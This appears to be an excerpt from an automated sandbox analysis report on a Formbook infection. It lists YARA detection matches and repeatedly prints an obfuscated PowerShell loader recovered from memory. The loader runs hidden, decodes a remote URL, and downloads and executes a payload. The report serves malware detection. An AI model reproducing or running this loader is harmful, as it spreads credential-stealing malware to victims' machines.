Source: 00000020.00000002.4221469550.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001A.00000002.2858446917.00000000229A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001A.00000002.2858446917.00000000233A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001A.00000002.2815202339.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000020.00000002.4221200788.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000021.00000002.4222243357.00000000012D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000020.00000002.4220745067.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001E.00000002.4222881972.0000000003590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7616, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7860, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: wab.exe, 0000000A.00000002.4231459057.000000000A087000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exer='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFE7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Host Application = powershell.exe -windowstyle hidden If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFA2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF
Source: powershell.exe, 00000002.00000002.2360203175.0000020B5AC65000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: powershell.exe-windowstylehiddenIf (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe
Source: powershell.exe, 00000005.00000002.2196876058.0000000002C60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\Desktop\C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshi
Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2202717320.0000000007397000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2206269200.000000000C162000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep 